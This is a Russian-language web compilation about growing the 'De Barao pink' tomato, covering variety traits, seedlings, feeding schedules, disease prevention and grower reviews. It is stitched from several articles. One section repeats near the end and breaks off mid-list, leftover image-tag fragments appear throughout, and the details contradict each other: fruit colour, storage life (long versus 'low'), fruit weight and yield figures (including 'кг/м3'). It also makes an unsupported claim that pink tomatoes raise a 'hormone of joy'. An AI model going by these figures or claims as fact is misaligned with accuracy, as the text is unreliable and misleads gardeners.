4 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Характеристика томата де барао розовый

Сорт томата Де Барао розовый

Среди наиболее любимых помидорных сортов особое место занимает томат Де Барао Розовый. Его вывели в 90-х годах прошлого века на территории Бразилии. Поскольку этот сорт неприхотлив в выращивании и обладает отменным вкусом, все больше дачников стараются разместить его у себя на участке.

Сорт томата Де Барао розовый

Характеристика сорта

Сорт Де Барао Розовый индетерминантный, выращивать томат удобно как в теплице, так и в открытой почве. Он остается плодородным вне зависимости от этих условий.

Культура среднепоздняя, обладает длительным периодом плодоношения. Время от появления всходов до урожая – 115 суток.

Кусты

В высоту кусты могут вырастать до 2 м. Междоузлия длинные, среднеоблиственные.

Соцветия простые, компактные. Закладываются на уровне 9 листка. Расстояние между ними обычно в 3 листочка.

О плодах

Описание указывает, что плоды сливовидной формой. Кожура гладкая, при полном созревании приобретает насыщенный красный цвет.

Вес одного помидора – 60 г. Количество семян минимальное. На одной кисти размещается до 10 плодов.

Томаты не трескаются при транспортировке. Их можно хранить в течение долгого времени. На вкус они сладкие, кислинки почти нет.

Урожайность

Согласно характеристике, урожайность высокого уровня. Средние показатели – до 7 кг с одного куста, но при более тщательном уходе – до 10 кг.

При выращивании в теплицах можно получить еще больше плодов. Самое важное – правильно подкармливать растения.

Преимущества и недостатки

Помидор Де Барао розовый обладает множеством достойных характеристик:

  • высокие показатели урожайности;
  • возможность долгосрочного хранения овощей;
  • устойчивость к вредителям и инфекциям;
  • длительные сроки плодоношения;
  • возможность выращивания в тени;
  • хорошая стойкость к разным погодным условиям.

Недостатков у сорта не так много.

  • необходимость большого пространства для выращивания;
  • обязательное использование подпорок и пасынкования;
  • нужна хорошая система вентиляции, которая не допустит появление гнили.

Эти условия необходимо учитывать, иначе растениям будет трудно нормально развиваться, это повлияет на плоды, снизит их качество и количество.

Использование плодов

Плоды используют для приготовления кетчупов и паст

Благодаря высокому содержанию витаминов и насыщенности вкуса, томаты сорта Де Барао подходят не только для употребления в сыром виде. Их используют для приготовления сока, кетчупа и салатов. Не менее вкусной получается и консервация.

Выращивание рассады

Процедуру следует начать с посева семян.

  1. Изначально выбирается ёмкость.
  2. В нее засыпается земля. Ее предварительно смешивают с перегноем. В такой почве для семян будут наиболее оптимальные условия для быстрого развития.
  3. Далее на поверхность засыпанного в ёмкость грунта помещают семена. Перед этим рекомендуется вымочить их в слабом растворе марганцовки, чтобы не допустить проявления разных инфекций.
  4. Сверху насыпается ещё один слой грунта. Его толщина не должна превышать 0,8 см.
  5. Аккуратно выполняется полив рассады. Делать это нужно так, чтобы семена не размылись и не просели слишком глубоко.
  6. Далее поверх ящика натягивается пленка. С ее помощью создается конденсат, который способствует более скорому прорастанию семян.

Когда у проростков появится по 2 крепких листка, их можно пикировать в отдельные емкости. Рекомендуется выбирать растения так, чтобы земля не отделялась от корневой системы. Это позволит сохранить ее от повреждений, которые могут иметь негативные для томатов последствия.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

При пикировке специально прищипывают кончик основного корешка, что стимулирует появление боковых корешков и разветвленной корневой системы.

Пересадка рассады

Пересаживать томаты в открытый грунт можно только по прошествии 65-70 дней. Лучший период выпадает на май. В это время погода благоприятно влияет на растения, а заморозки уже не угрожают своим возвращением.

Землю нужно немного подготовить: перекопать и внести удобрения – компост, азот и калий. Затем выкапывают специальные углубления для рассады. На дно засыпают золу.

Глубина ямок не должна быть слишком большой. Лучше использовать схему 40 х 60 см.

При посадке корни важно равномерно распределить по дну ямки. Растениям нужна будет опора. Лучший вариант — вбить колышки и подвязывать помидоры к ним. Опорой может стать и забор, поскольку культура вполне хорошо растет даже на затемненных участках.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

При выращивании рассады в кассетах, корневая системы хорошо оплетает ком земли. Такая рассада легко вынимается из ячейки кассеты, при этом земля не осыпается с корней и рассада быстро приживается на месте.

Уход за томатами

  1. Поливают помидоры раз в 10 дней, строго под корень. Такой подход не позволит грибкам появиться на листьях и плодах из-за переизбытка влаги.
  2. Растение нужно периодически подкармливать. Первую процедуру проводят при высадке в открытую почву. Вторую – во время цветения, а третью – с началом созревания плодов. Для удобрения и подкормок больше всего подходят органические вещества. Перегной, зола, калий и азот — наиболее востребованные. Их рекомендуется чередовать между собой.
  3. Для этого сорта характерно формирование одного плотного побега. Остальные побеги, особенно нижние, нужно подрезать на 3 см раз в 2 недели, но делать это аккуратно, чтобы не срезать слишком много побегов.

Татьяна Орлова (Василидченко) (канд. с.-х. наук):

Куст у сорта Де барао довольно ажурный, листья некрупные, поэтому вполне возможно выращивать этот сорт в два стебля. Второй стебель обычно закладывают при высоте растения 80-100 см,используя один из сильных пасынков.

Профилактика заболеваний и вредителей

Профилактические меры помогут сохранить здоровье растений

Большинство грибковых инфекций и вредителей не страшны для томатов, но все же есть вероятность заражения некоторыми заболеваниями.

Исключить их появление можно при помощи несложной профилактики. Эффективнее всего проводить ее весной и сразу при высадке растений в грунт.

При пересадке применяют бордоскую жидкость (0,5%), а с появлением первых соцветий — 1%. Опрыскивают все листочки.

Через 2 недели, с приходом лета, используют раствор коллоидной серы (в 5 л воды разводят 40 г вещества). Им обрабатывают побеги.

Сбор и хранение урожая

Благодаря тому, что у помидоров этого сорта прочная кожура, хранить их можно долго, но делать это нужно в прохладных местах, где нет повышенной влажности. В таких условиях они будут защищены от появления грибковых болезней.

Согласно описанию, сбор начинают с момента покраснения плодов. Урожайность высокая, а плодоношение растянутое, поэтому последние плоды собирают в октябре.

Для дозревания помидоры помещают в место с высоким уровнем освещенности. При этом они не теряют своих отменных вкусовых характеристик.

Отзывы садоводов

Сорт томата Де Барао розовый довольно популярен и заслуживает положительную оценку.

Плоды сладкие, их выгодно использовать для приготовления соусов, соков и салатов. Уход за растениями не требует слишком больших усилий. Выращивать их можно как в открытом грунте, так и в теплицах.

Характеристика томата Де Барао Розовый

Если вы хотите получить богатый урожай помидор, но особо не желаете заморачиваться с выращиванием, вам стоит выбрать томат Де Барао розовый. Выбор такого сорта, на первый взгляд, покажется банальным, но розовый помидор принесет вам богатый урожай, а вместе с ним хороший товар на продажу.

Характеристика томата Де Барао Розовый

Происхождение сорта

Название сорта имеет бразильские корни, Де Барао розовый был выведен еще в начале 90 годов, и завезен в нашу страну. Помидорчик, пришелся по вкусу нашим соотечественникам, теперь его выращиванием занимается почти каждый огородник.

Сорт Де Барао истинный розовый по-другому еще называют гигантом, прозвище было получено благодаря индетерминантности сорта, что означает постоянный рост и развитие растения. Именно поэтому выращивание такого вида томатов приносит богатый урожай, о чем говорят многочисленные отзывы.

Характерные особенности и описание

Помидоры – продукт широкого использования, без них не обходится ни один ужин или обед современного человека. Мы добавляем плод везде: в пасту, в картофель (в виде кетчупа), делаем салаты, соки, консервируем в целом виде. Особенности розовых сортов:

  • бледный или ярко-розовый цвет плодов;
  • округлые формы;
  • плотная кожура;
  • наличие двух камер;
  • мягкая мякоть, тающая во рту.

Чтобы наглядно ознакомиться с красивейшим из овощей, можно посмотреть фото или видео, описание культуры. Сорт Де Барао, можно выращивать в различных условиях:

На полное созревание плода уходит около ста двадцати дней, что говорит о позднем созревании овоща. Плод имеет овальную или круглую форму, цвет бледно розовый. Имеет до семи камер, масса до 80 грамм. Мякоть плотная, сочная. Вкус кисло-сладкий, не приторный.

Помидорная польза

Помидоры – кладезь витаминов и микроэлементов, необходимых для жизнеобеспечения нашего организма. Несколько помидорин среднего размера покроет суточную потребность витамина С, который необходим для профилактики вирусных заболеваний.

Употребляя в пищу овощ розового цвета – вы повысите у себя содержание гормона радости, тем самым зарядившись позитивом на целый день. Томаты также содержат в себе кальций, магний и большое количество витаминов группы В и Е, что очень важно для роста волос и ногтей, для их здорового вида.

Применение томатов

Плоды подходят для приготовления кетчупа

  • для употребления в сыром виде;
  • для консервации;
  • из розовых помидор также делают сок и кетчуп.

Характеристика сорта розовых томатов: высокорослые, позднеспелые помидорки с урожайностью до 6 килограмм с одного куста. Главная особенность – возможность произрастания в тени, что позволяет: экономить место на огороде, возможность прикрепить помидорный куст к забору или другому дереву. Общая характеристика развития растения:

  • непрерывный рост кустарника;
  • рослый стебель;
  • каждое соцветие приносит до восьми плодов;
  • позднеспелое растение (созревает за три или четыре месяца);
  • может созревать в тени;
  • стойкий по отношению к заболеваниям и вредителям.

Преимущества и недостатки сорта

Достоинства Де Барао

  • высокая урожайность, что полезно при продажах в промышленных масштабах;
  • универсальность применения: подходит для употребления в пищу и для закатки консервации;
  • имеют способность долго сохранять свои качества, хорошо переносят транспортировку;
  • предназначены для длительного хранения;
  • способны плодоносить даже в условиях первых заморозков;
  • могут дозревать после снятия с ветки;
  • стойкие против погодных условий.

Недостатки

Требует хороших тепличных условий с высокой крышей, нужна установка подпорок. Недостаток выращиваемых в тепличных условиях растений – это возможное загноение и плесень. Во избежание такого рода проблем следует: очищать и проветривать помещение теплицы. Избегайте конденсата. Продумайте систему вентиляции.

Для профилактики от вредителей следует применять современные инсектициды, хотя бы раз в месяц. Оздобливать почву медным купоросом, который также поможет справиться с насекомыми.

Выращивание томата самостоятельно

Для посадки помидор более подходящими являются южные и центральные регионы страны. Особенно там, где равнины, а не гористая поверхность. Всегда соблюдайте правила ухода за растением. Температурный режим, влажность воздуха, удобрение и борьба с вредителями – все это составные успешного сбора урожая. Отзывы о рассматриваемом виде – исключительно положительные, а подробное описание наталкивает лишь на мысль о том, что он идеален.

Выращивание розовых помидорок не потребует особых навыков. Для начала, определитесь с местом посева семян. Землю следует предварительно удобрить и распушить. Затем посеять семена помидор, прикопать их грунтом и полить. Поверх постелить пленку для создания конденсата, который быстрее поможет взойти вашей рассаде.

Описание томата Де Барао розовый, урожайность сорта, отзывы

Первый весенний месяц – идеальное время, чтобы задуматься о том, какие сорта томатов посадить на рассаду. При выборе сорта стоит учитывать климатические особенности местности, будут ли томаты выращиваться на открытом грунте либо в теплице.

Также важно узнать и о характеристиках спелых плодов, их предназначении, вкусовых качествах, сроках созревания.

Один из сортов, пользующихся популярностью у садоводов, является «Де Барао» розовый. Рассмотрим подробнее, чем он примечателен, и как правильно выращивать культуру.

Особенности сорта

Назначение томатов универсальное. Их можно применять для приготовления любых салатов, добавлять в первые блюда, гарниры, овощные рагу, запеканки и т.д. Особенно хорош «Де Барао» розовый в свежем виде. Можно почувствовать, как раскрывается его тонкий нежный вкус.

Чтобы сохранить томаты на зиму, их консервируют целиком: маринуют, солят.

Из томатов делают сок, который употребляют сразу же либо пастеризуют и закатывают в банки. Однако именно из этих томатов соки и соусы делают редко.

Описание куста

Куст индетерминантный с продолжительным периодом плодоношения (во время роста формируются новые завязи, образуются кисти с плодами). Обычно на кусте образуется до 6 кистей, на каждой из которых до 10 томатов. Первое соцветие формируется над 9-11 листком, следующие через каждые три листка. Помидоры на кустах висят красивыми аккуратными гроздьями. Кусты среднеоблиственные.

Высота куста может достигать двух метров. Для таких высоких растений требуется жесткая опора, к которой стебель подвязывают по мере его роста.

Сорт относится к теневыносливым. Если томаты других сортов быстро зачахнут при недостатке света, то розовый «Де Барао» успешно будет цвести и плодоносить в тени садового дерева, высокой изгороди и т.п. Теневыносливость сорта – несомненный плюс для тех садоводов, чьи земельные участки находятся в не самой благоприятной климатической зоне с небольшим количеством солнечных дней в течение лета.

Первый урожай получают через 110-125 дней после прорастания семян. С одного квадратного метра можно получить минимум 5,4-5,8 кг томатов. Если же в период выращивания условия максимально благоприятные, вовремя обеспечивается подкормка, соблюдается агротехнология, то урожайность составит от 7-10,0 кг/м3.

Томаты на вкус мясистые, кисло-сладкие. Имеют вытянутую овальную форму. Снизу у плодов заостренный «носик». Кожица упругая, блестящая, оттенок розовый или светло-красный, могут быть зеленые пятна. Внутри плодов 2 камеры с небольшим количеством семян. Средний вес плодов – 60 граммов, максимальный – 80 граммов.

Достоинства и недостатки сорта

Положительные качества Отрицательные стороны
Теневыносливость. Требуется много места в теплице. На каждом квадратном метре может быть размещено только два куста.
Неприхотливость сорта и устойчивость к заболеваниям, вредителям. Необходимость подвязки длинных стеблей.
Высокая урожайность. Необходимость проведения пасынкования.
Хороший товарный вид плодов, их способность к дозреванию.
Длительный период плодоношения.
Широкое применение урожая томатов, возможность цельноплодного консервирования.
Продолжительный период хранения урожая.

Выращивание рассады: пошаговая инструкция

В какие сроки высаживать семена на рассаду? Заниматься этим можно с первых чисел марта. Но если томаты будут расти в открытом грунте, лучше отложить это до первых чисел апреля. Спешить с посадкой рассады не стоит, если высаживать семена в феврале, есть риск, что растения в дальнейшем замерзнут при ночных понижениях температуры.

Шаг 1. Проращивание семян на туалетной бумаге.

Перед началом работы нужно подготовить:

  • подложку для ламината нефольгированную толщиной 2 мм;
  • туалетную бумагу хорошего качества, лучше двух- или трехслойную;
  • спринцовку;
  • препарат «Эпин»;
  • теплую воду – 0,5 – 1 л;
  • острый нож;
  • резинки канцелярские или скотч.

Подложка для ламината продается в рулонах. От этого рулона необходимо отрезать ленту шириной 14-16 см. Удобнее всего отмерить от края рулона необходимую ширину, поставить метку маркером, а затем произвести резку ножом, не разворачивая заранее рулон.

Отрезанную ленту необходимо разместить на столе. Желательно заранее застелить стол клеенкой или подложить большой разнос для работы.

Край ленты подложки необходимо совместить с краем рулона туалетной бумаги, после чего раскатать оба до края стола или чуть меньше.

В воде нужно развести «Эпин». На 0,5 литра – 2-3 капли препарата. Раствор стоит хорошо перемешать и набрать в спринцовку.

Из спринцовки раствор необходимо равномерно выливать на туалетную бумагу, чтобы она хорошо пропиталась.

Теперь можно заниматься раскладыванием семян. Рекомендуется захватывать их по одной штуке пинцетом либо мокрой зубочисткой и класть на бумагу, отступая 5 см от короткого края подложки, 1,5 см от верха и соблюдая интервал 1-3 см между семенами.

Когда все семена будут высажены, остается только отрезать излишки подложки, а затем свернуть ленту в плотный рулон, который можно зафиксировать резинкой или скотчем.

Рулоны нужно закрыть пищевой пленкой, мешком для мусора или другим аналогичным материалом, после чего убрать ящик (стакан) в теплое место на три дня. В этот период свет семенам не нужен.

Через три дня нужно проверить, насколько хорошо прорастают томаты. Пленку необходимо убрать, рулончики по одному развернуть на столе. Если семена проклюнулись, показались зеленые петли, можно переходить к следующему этапу работы.

Шаг 2. Выращивание рассады в рулонах.

Проклюнувшиеся семена с туалетной бумаги убирать не нужно. Прямо на туалетную бумагу необходимо ложкой или лопаткой насыпать двухсантиметровый слой рыхлого грунта.

Ничего страшного, если грунтом будут засыпаны проросшие семена. Для удобства стоит одновременно насыпать грунт и закручивать рулон.

Когда вся «улитка» будет засыпана грунтом, закатана и зафиксирована резинкой, ее нужно поставить вертикально, а сверху добавить еще земли, чтобы она покрыла все витки рулона.

Рулон желательно поставить в ящик, на дно которого засыпан слой опилок. Этот материал хорошо впитывает и сохраняет влагу, обеспечивая комфортные условия для роста рассады.

Ящик снова нужно закрыть пакетом и убрать в теплое место. Открывать ящик можно, когда из грунта появятся зеленые ростки. После этого рассаду нужно перенести в светлое место, например, на подоконник, либо стеллаж для рассады.

Шаг 3. Полив рассады желательно осуществлять спринцовкой, не размывая грунт.

Шаг 4. Пикирование рассады.

Пикировать рассаду можно в любые емкости – стаканчики, втулки от туалетной бумаги, ящики. Но удобнее всего пикировать рассаду в «пеленки» из пленки. Отлично подойдут для этого полиэтиленовые пищевые фасовочные пакеты.

Пикировать рассаду можно, когда у растений будет 2-4 настоящих листа.

Процедура пикирования из «улитки» в «пеленки» максимально проста:

  • рулон с рассадой кладут на стол, снимают фиксирующую резинку или липкую ленту;
  • край рулона разворачивают. Достаточно отогнуть край 15-20 см;
  • на столе расстилают первый пакет;
  • из «улитки» лопаткой извлекают первый росток вместе с комом земли, стараясь не повредить корневую систему. Росток переносят на расстеленный пакет;
  • росток засыпают одной или двумя столовыми ложками грунта так, чтобы он закрыл корень и стебель до самых семядольных листков;
  • низ пакета подгибают, после чего закручивают края вокруг корня с засыпанным грунтом. Края можно закрепить кусочком скотча.

Рассаду в «пеленках» ставят в ящики для фруктов плотно друг к другу.

Шаг 5. Закаливание рассады.

Когда распикированная рассада достаточно окрепла, ее можно выносить в поликарбонатную теплицу и накрывать укрывным материалом. Если такой возможности нет, рассаду можно закаливать на балконе либо на окне, открывая форточку сначала ненадолго, затем увеличивая время проветривания до 2-3 часов.

Рассада после закаливания становится более крепкой, менее прихотливой, формируется «иммунитет» к внезапным перепадам температуры воздуха в течение лета.

Пересадка рассады в теплицу

Высокие кусты «Де Барао» теневыносливы, но не стоит чрезмерно затенять растения, ведь это скажется на скорости их роста и количестве урожая. Оптимально, если между соседними кустами будет от 90 до 120 см свободного пространства.

Грядки желательно подготовить заблаговременно, перекопав грунт, добавив в него перегной. Чтобы грунт лучше прогрелся, за 3-5 дней до высаживания рассады грядку можно накрыть черной пленкой.

Высаживание рассады производят, когда воздух в течение дня прогревается до +20… +22°С, а ночью минимум до +15°С.

На одном квадратном метре грядки делают только две лунки. В лунку желательно добавлять столовую ложку золы. Росток в лунке располагают вертикально, не подворачивая корни, после чего присыпают землей и обильно поливают вокруг стебля.

Колышки для подвязки кустов вбивают одновременно с высаживанием рассады в грунт. Если проводить это мероприятие позже, то возможно повреждение корневой системы, что крайне нежелательно для растений.

Уход за взрослыми томатами в теплице

Розовые томаты любят обильный полив. Но не стоит переувлажнять грунт, важно, чтобы вода не застаивалась на грядках.

Томаты «Де Барао» отличаются сильной ветвистостью. Чтобы получить максимум урожая с одного куста, необходимо проводить пасынкование и формировать растения в два стебля.

В период появления завязей можно удалить нижние листья растений. Это обеспечит лучшую проветриваемость, и хороший рост плодов.

Подкормку томатов производят в следующем порядке:

  • первой подкормкой считается добавление в лунку золы при высаживании рассады. В золе достаточно макро- и микроэлементов, необходимых для активного роста растений;
  • через две недели после высадки рассады на грядку производят вторую подкормку, применяя для этого «зеленый чай». Удобрение готовят из крапивы, подорожника, садовых сорняков и коровяка. В бочку объемом 50 литров закладывают до 5 кг травы, добавляют стакан жидкого коровяка и заливают воду. В течение нескольких дней удобрение будет «настаиваться». Перед применением его перемешивают. Под каждый куст наливают 2 литра «зеленого чая»;
  • третью подкормку рекомендуется делать в период цветения томатов. Под каждый куст выливают по 1 л удобрения, состоящего из жидкого коровяка (0,5 л), птичьего помета (0,5 л), сульфата калия (1 ст. ложка). Заменить это удобрение можно нитрофоской, размешивая в ведре воды 1 столовую ложку порошка. Расход готового раствора составляет 1л на 1 куст;
  • четвертая подкормка во время появления завязей. Рабочий раствор готовят из древесной золы (2 литра на 10 литров воды) и борной кислоты (10 г). Перед применением смесь настаивают 24 часа. Расход раствора – 1 л на 1 куст;
  • последняя пятая подкормка необходима, чтобы томаты быстрее созревали, а их вкус был более насыщенным. В период активного созревания плодов кусты поливают раствором суперфосфата и жидкого гумата натрия (на десятилитровое ведро воды соответственно 2 и 1 ст. ложки удобрений).

Профилактика заболеваний

  • Чтобы предотвратить возникновение фитофтороза, необходимо часто проветривать теплицу.
  • От вершинной гнили поможет опрыскивание растений раствором древесной золы.
  • Чтобы исключить колонизации трипсов и тли на листьях, стоит обрабатывать кусты препаратом «Зубр».

Сбор и хранение урожая

Плоды можно снимать с куста в незрелом виде и складировать в помещении с целью дозревания.

Хранить томаты удобно в пластиковых ящиках для фруктов, выкладывая плоды в три слоя и прокладывая бумагу между ними.

Отзывы

Лилия, город Пятигорск
Я семена перед посевом протравливаю в марганцовке, а потом проращиваю. Рассада получается крепкая, здоровая. На кустах помидоры вырастают плотными, очень вкусными.

Федор, город Батайск
Я выращиваю «Де Барао» в теплице. Здесь их легче подвязывать к шпалерам, да и урожая получается больше, чем при выращивании в открытом грунте. Семена на рассаду я высаживаю в середине марта. А для досвечивания рассады применяю фитолампы.

Никита, город Павлоград
Мне сорт не понравился. Надо слишком много усилий прикладывать, чтобы его вырастить. Чего стоит одно пасынкование, постоянно надо подвязывать. Я не готов проводить на даче слишком много времени, такой сорт не для меня. На вкус томаты, конечно, хороши, но на следующий год выращивать не буду.

Томат Де барао розовый: описание сорта и 5 шагов агротехники

Первый раз посадила Де барао розовый 5 лет назад в теплицу и с тех пор не могу с ним расстаться. Причем собираю собственные семена, и из года в год томаты радуют своей урожайностью. Самым главным достоинством этого сорта является то, что плоды долго хранятся без потери вкусовых качеств.

Подходит для коммерческого выращивания

Томат Де барао розовый

Общая
характеристика
Среднеспелый
Период
созревания
115-120 дней после всходов
Лежкость
(сохранность на хранении)
Низкая
Назначение Салатное, консервное (для переработки на соки и соусы)
Масса плода 40-120г
Количество
плодов на кисти
4-5
Устойчивость
к заболеваниям
Высокая
  1. Де барао— томаты среднепозднего срока созревания индетерминантного сорта способные достигать в высоту 4 м. Период вызревания плодов составляет 115-120 дней, поэтому в условиях северных территорий рекомендован к выращиванию в теплицах.
  2. Кусты вырастают с мощными стеблями и крупной листвой. Соцветия формируются между 9 и 10 листом, последующие через каждые 3 листа. Завязей на соцветиях образуется 6-12, что позволяет собирать плоды кистями.
  3. Плоды сливовидной формы с носиком и без. Цвет может быть красный, желтый, розовый, черный. В среднем на каждой кисти вызревает до 10 томатов, массой 40-120 г. Мякоть плотная, сочная, сладкая на вкус. Внутри каждого томата образуется по 2 семенные камеры. Кожица плотная, но тонкая, при обильных поливах в период созревания склонна к растрескиванию.
  4. Выращивают Де барао как в подсобных так и в фермерских хозяйствах. Высокая урожайность томатов позволяет снимать с куста до 20 кг плодов за сезон. Устойчивость к болезням из-за продолжительного срока созревания слабая, поэтому томаты нуждаются в профилактической обработке.

На фото — гигантский Де барао ярко-розового цвета. Фото: agrognom.ru

Автор видеоролика рекомендует выращивать томаты Де барао, как самые урожайные виды. Практически при любых погодных условиях помидоры дают стабильный урожай выровненных томатов с отличными вкусовыми качествами:

Популярные сорта помидоров Де барао

autogear.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d55073090fab0.jpg» alt=»table_pic_» w /> Томат Де барао розовый

Описание:

  • средняя высота куста не превышает 2 метров;
  • урожайность с куста в теплице достигает 10 кг, в открытом грунте 5-6 кг;
  • средний вес розовых плодов составляет 80-100 г;
  • срок созревания томатов 110-120 дней
  • мякоть сочная, сахаристая, с приятным томатным вкусом;
  • подходят для цельноплодного консервирования и употребления в свежем виде
fermilon.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d5507313406f3.jpg» alt=»table_pic_» w /> Де барао красный

Описание:

  • среднепоздний сорт с периодом созревания 120-130 дней;
  • высота куста может достигать в теплице 3 м;
  • плоды ярко-красного цвета, овально-цилиндрической формы, массой 80-100 г;
  • мякоть очень плотная, что позволяет их долго хранить в свежем виде;
  • подходят для цельноплодного консервирования и употребления в свежем виде
img4.st.kashalot.com » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550731eadb48.jpg» alt=»table_pic_» w /> Черный

Описание:

  • среднеспелый томат с периодом созревания 115-130 дней;
  • кусты высокие с мощной корневой системой, что позволяет переносить растениям понижение температур без потерь урожайности;
  • плоды небольшие, сливовидные, красные с темным отливом, массой 40-80 г;
  • на одной кисти может образовываться большое количество спелых томатов;
  • урожайность с 1 кв.м достигает 15 кг
fermer.blog » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550732d89703.jpg» alt=»table_pic_» w /> Гигант

Описание:

  • срок созревание гигантских кустов составляет 125-135 дней, что позволяет их выращивать исключительно в теплице;
  • кусты превышают в высоту 3 м;
  • плоды округлые с вытянутым носиком, массой 350 г. У плодоножки образуется характерное зеленое пятно;
  • урожайность высокая привлекает фермеров для выращивания в коммерческих целях. С одного куста можно собрать до 25 кг плодов
sadik45.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d55073389fc44.jpg» alt=»table_pic_» w /> Помидоры де барао царский

Описание:

  • индетерминантный сорт с мощными кустами высотой до 2 м;
  • срок созревания 110-120 дней;
  • плоды красные, среднего размера, массой до 170 г;
  • урожайность с куста превышает 15 кг;
  • вкусовые качества отменные с ярко выраженным сладким томатным вкусом
Де барао золотой

Описание:

  • ярко-желтые плоды созревают немного раньше красноплодных томатов через 110-120 дней;
  • высота куста 2 м, урожайность 12 кг с куста;
  • плоды вытянутой формы массой 80-90 г;
  • подходят для свежего употребления и консервирования

Высаживать рассадой в открытый грунт

autogear.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550734b09518.jpg» alt=»table_pic_» w /> Шаг 1. Выращивание рассады

  • в общую емкость с плодородным и рыхлым грунтом проводят посев подготовленных семян;
  • семена на рассаду перед посадкой выдержать в растворе марганцовки 30 мин;
  • первые всходы появляются через 5-7 дней. После появления 2-3 листочков можно приступать к пикировке рассады
eda-land.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550735791488.jpg» alt=»table_pic_» w /> Шаг 2. Посадка

  • по достижении возраста рассады 60 дней она полностью готова к высадке на постоянное место;
  • учитывая быстрый рост кустов при посадке, следует предусмотреть высокие шпалеры для подвязки;
  • на 1 кв.м следует высаживать не более 3 кустов
eda-land.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d5507363307f5.jpg» alt=»table_pic_» w /> Шаг 3. Полив

  • полив должен быть умеренный, первые 2 недели после пересадки 1 раз в 3-5 дней;
  • при появлении цветочных кистей поливать по мере необходимости, следя за тем, чтобы не поникали листья;
  • для сохранения влаги в почве использовать мульчу
nasotke.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550737306cf5.jpg» alt=»table_pic_» w /> Шаг 4. Подкормка

  • 1 раз в две недели использовать суперфосфат при поливе посадок (20 г на ведро воды);
  • 1 раз в месяц поливать настоем птичьего помета (0,5 л на ведро);
  • хороший эффект дает полив настоем крапивы 1 раз в месяц
dachavremya.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550737d18980.jpg» alt=»table_pic_» w /> Шаг 5. Формирование кустов

  • каждые 7-10 дней на стеблях убирать боковые пасынки. Формировать куст в 1-2 стебля;
  • по достижении 2 м роста, у стеблей прищипнуть макушки;
  • по мере образования цветочных кистей удалять нижние листья

Болезни и вредители

plantdoctor.pbworks.com » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d550738e04e20.jpg» alt=»table_pic_» w /> Черная пятнистость

Способы борьбы:

  • обработать посадки фунгицидом Фитолавин;
  • убрать пораженные части растения;
  • провести опудривание древесной золой или толченым активированным углем
ferma-biz.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d55073a51fd13.jpg» alt=»table_pic_» w /> Вершинная гниль

Способы борьбы:

  • при внесении удобрений использовать подкормки из птичьего помета;
  • по листу 2-3 раза за сезон обработать кусты раствором кальциевой селитры;
  • следить за влажностью почвы и не допускать застоя воды в корнях;
  • для предотвращения переувлажнения земли использовать мульчу
agronomu.com » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d55073b01bc82.jpg» alt=»table_pic_» w /> Слизни

Способы борьбы:

  • часто проветривать теплицы и пленочные укрытия;
  • рыхлить почву вокруг кустов;
  • посыпать посадки и землю вокруг древесной золой смешанной с красным жгучим перцем

Отзывы огородников

Светик, Ступино

Мощный индет, росло 2 куста в теплице. Плоды получились с носиком, очень красивые, вкусные , вес около 50-70 грамм.

Креатив

Плоды средние. От размера крупного куриного яйца. Гигантами не вырастают . На вкус сладкие. Кислоты нет. Очень хороши для приготовления салата.

Что надо запомнить

  1. Высаживать на 1 кв.м не более 3 кустов. Учитывая высоту кустов и мощные стебли томатам Де барао требуется большая площадь для роста.
  2. Поливать умеренно. С осторожностью поливать в период образования плодов, так как томаты склонны к растрескиванию.

Проводить профилактические обработки посадок. В период выращивания томатов проводить профилактические обработки посадок древесной золой, красным перцем, чесночной настойкой

Томат Де барао розовый: описание сорта и 5 шагов агротехники

Первый раз посадила Де барао розовый 5 лет назад в теплицу и с тех пор не могу с ним расстаться. Причем собираю собственные семена, и из года в год томаты радуют своей урожайностью. Самым главным достоинством этого сорта является то, что плоды долго хранятся без потери вкусовых качеств.

Подходит для коммерческого выращивания

Томат Де барао розовый

Общая
характеристика
Среднеспелый
Период
созревания
115-120 дней после всходов
Лежкость
(сохранность на хранении)
Низкая
Назначение Салатное, консервное (для переработки на соки и соусы)
Масса плода 40-120г
Количество
плодов на кисти
4-5
Устойчивость
к заболеваниям
Высокая
  1. Де барао— томаты среднепозднего срока созревания индетерминантного сорта способные достигать в высоту 4 м. Период вызревания плодов составляет 115-120 дней, поэтому в условиях северных территорий рекомендован к выращиванию в теплицах.
  2. Кусты вырастают с мощными стеблями и крупной листвой. Соцветия формируются между 9 и 10 листом, последующие через каждые 3 листа. Завязей на соцветиях образуется 6-12, что позволяет собирать плоды кистями.
  3. Плоды сливовидной формы с носиком и без. Цвет может быть красный, желтый, розовый, черный. В среднем на каждой кисти вызревает до 10 томатов, массой 40-120 г. Мякоть плотная, сочная, сладкая на вкус. Внутри каждого томата образуется по 2 семенные камеры. Кожица плотная, но тонкая, при обильных поливах в период созревания склонна к растрескиванию.
  4. Выращивают Де барао как в подсобных так и в фермерских хозяйствах. Высокая урожайность томатов позволяет снимать с куста до 20 кг плодов за сезон. Устойчивость к болезням из-за продолжительного срока созревания слабая, поэтому томаты нуждаются в профилактической обработке.

На фото — гигантский Де барао ярко-розового цвета. Фото: agrognom.ru

Автор видеоролика рекомендует выращивать томаты Де барао, как самые урожайные виды. Практически при любых погодных условиях помидоры дают стабильный урожай выровненных томатов с отличными вкусовыми качествами:

Популярные сорта помидоров Де барао

autogear.ru » src=»https://qlumba.com/wp-content/uploads/2019/08/fmg5d55073090fab0.jpg» alt=»table_pic_» w /> Томат Де барао розовый

Описание:

  • средняя высота куста не превышает 2 метров;
  • урожайность с куста в теплице достигает 10 кг, в открытом грунте 5-6 кг;
  • средний вес розовых плодов составляет 80-100 г;
  • срок созревания томатов 110-120 дней
  • мякоть сочная, сахаристая, с приятным томатным вкусом;
